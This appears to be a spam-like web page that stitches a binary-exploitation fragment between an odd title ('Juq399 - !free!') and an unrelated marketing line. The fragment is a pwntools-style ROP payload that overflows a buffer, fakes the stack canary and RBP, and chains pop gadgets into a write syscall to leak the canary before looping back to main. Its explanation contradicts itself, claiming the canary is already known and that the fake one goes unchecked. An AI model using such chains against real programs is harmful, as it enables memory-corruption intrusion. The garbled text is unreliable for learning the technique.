Juq399 - !free!

Now that we know the canary, we can craft a second payload that:

payload = b'A'*offset # fill buffer payload += b'B'*8 # dummy canary (won't be checked yet) payload += b'C'*8 # fake RBP payload += p64(pop_rdi) payload += p64(1) # fd = stdout payload += p64(pop_rsi) payload += p64(canary_addr) payload += p64(0xdeadbeef) # filler for r15 payload += p64(pop_rdx) payload += p64(8) # size payload += p64(syscall) # perform write payload += p64(elf.symbols['main']) # loop back to start juq399

Best for: Creating mystery or launching a niche tech project. Now that we know the canary, we can